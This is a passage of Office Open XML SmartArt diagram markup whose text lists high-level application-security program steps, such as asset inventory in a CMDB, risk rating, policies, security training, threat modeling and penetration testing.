    <dgm:cxn modelId="{21A9CDF6-6611-4A46-8981-112255F11B72}" type="presOf" srcId="{A1479BB3-2B0C-4404-94D6-2197429E5F40}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9FA5EEF9-FC1E-471E-AA6B-61CD14402259}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{283161DE-6A31-495D-AEDA-E52A0867C7C2}" srcOrd="1" destOrd="0" parTransId="{66AE2DF9-D615-419B-A3B1-718C325B9060}" sibTransId="{E1EE3CF9-0D03-4600-9016-C008C52EB78A}"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{E6B7B6F4-F827-483D-B463-427183ED5830}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF44EDF3-4505-446C-8D9E-8964E7CA3E7A}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF18E836-ADCC-4ADD-BF77-2F15A3EAB282}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0EC64AF3-E2C7-4AF7-A1FC-3BFCD87966AC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8127C106-8A06-4009-B136-777ACDDDD57F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D777A049-87AD-4EE5-932B-9078778B4323}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48AAB212-71DA-4491-9654-7415FB51C308}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{11E452D5-8F7F-4C35-83BC-53F0647C259B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8D1C1677-B6A3-41BD-9172-D7CF8A1CC0D9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{286C205C-7705-4A53-8C18-C8E7EF199705}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7C34ED21-6657-4A94-915C-12E37FC966FA}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{20FC20BF-FD5E-41EF-9EB5-070EF18875CC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E615E3D8-7A0C-4FEA-B4DE-65BC134B114C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{EC45E8B0-A02C-4D9F-97F6-E967FAE22756}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AA34C128-8A76-4165-9739-9F23C6E82589}" type="presParOf" srcId="{EC45E8B0-A02C-4D9F-97F6-E967FAE22756}" destId="{46761723-0BDC-4B34-95D2-64CA865380D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{29B261AE-56AC-4EAB-862A-785F69C64226}" type="presParOf" srcId="{EC45E8B0-A02C-4D9F-97F6-E967FAE22756}" destId="{7532B555-E471-41D8-8A92-ECA00447B8E6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A459C634-8AD9-485A-BFE4-09041D982847}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{BF026182-1207-4E8F-A3F0-B0DE83ED17D6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E59F9A95-200F-42A4-BD23-884EE79FBB88}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4360DE27-BDD4-4BBE-93EC-11D8ECCF5C29}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{783EC65E-F846-4D6E-AC1D-6DA867F34708}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE4AC549-CAAD-4CE5-8AC0-84E4DB749C42}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A792A45E-08FC-462A-90A0-F280BB083ED6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EC92A7D6-82B5-4445-9F96-1081A436E749}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B32806D-7EE2-477D-8412-3E65680AE962}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A7A8A066-134F-4C05-8645-4C7F4068D3B4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5E047A18-0E51-46AB-B90F-F7B0C73F34A7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87A1B6BB-3522-4456-9BEB-329CF9E0DF14}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1174C7B4-11E6-4B18-BD13-70FD237624A3}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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4293075" y="-2191458"/>
          <a:ext cx="980124"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150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Document all applications and associated data assets </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" kern="1200" noProof="0" dirty="0"/>
            <a:t>in a Configuration Management Database (CMDB).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> and drive adoption. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Conduct a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> improvement areas and an execution plan. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Gain management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>application security awareness campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> for the entire</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> IT organization.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2003361" y="146102"/>
        <a:ext cx="5511706" cy="884432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184" cy="1171277"/>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90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200"/>
            <a:t>Get Started</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="-961617"/>
          <a:ext cx="956146"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150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>protection needs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t> from a business perspective.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> This should be driven in part by privacy laws and other regulations relevant to the data asset being protected. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> of your organization's tolerance for risk. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="1000" b="0" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="0" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033071" y="1386760"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="1232520"/>
          <a:ext cx="938893" cy="1171277"/>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dirty="0"/>
            <a:t>Risk Based Portfolio Approach</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4339580" y="268223"/>
          <a:ext cx="946532"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150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> that provide an application security baseline for all</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> development teams to adhere to.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>common set of reusable security controls </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>that complement these policies and standards and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> that is required and targeted to different</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="2620939"/>
        <a:ext cx="5513346" cy="854120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2462361"/>
          <a:ext cx="938893" cy="1171277"/>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a:t>Enable with a Strong Foundation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4324133" y="1498065"/>
          <a:ext cx="977426"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150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> activities into existing development and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>threat modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, secure design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, secure coding &amp; </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>code review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>penetration testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, and remediation.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
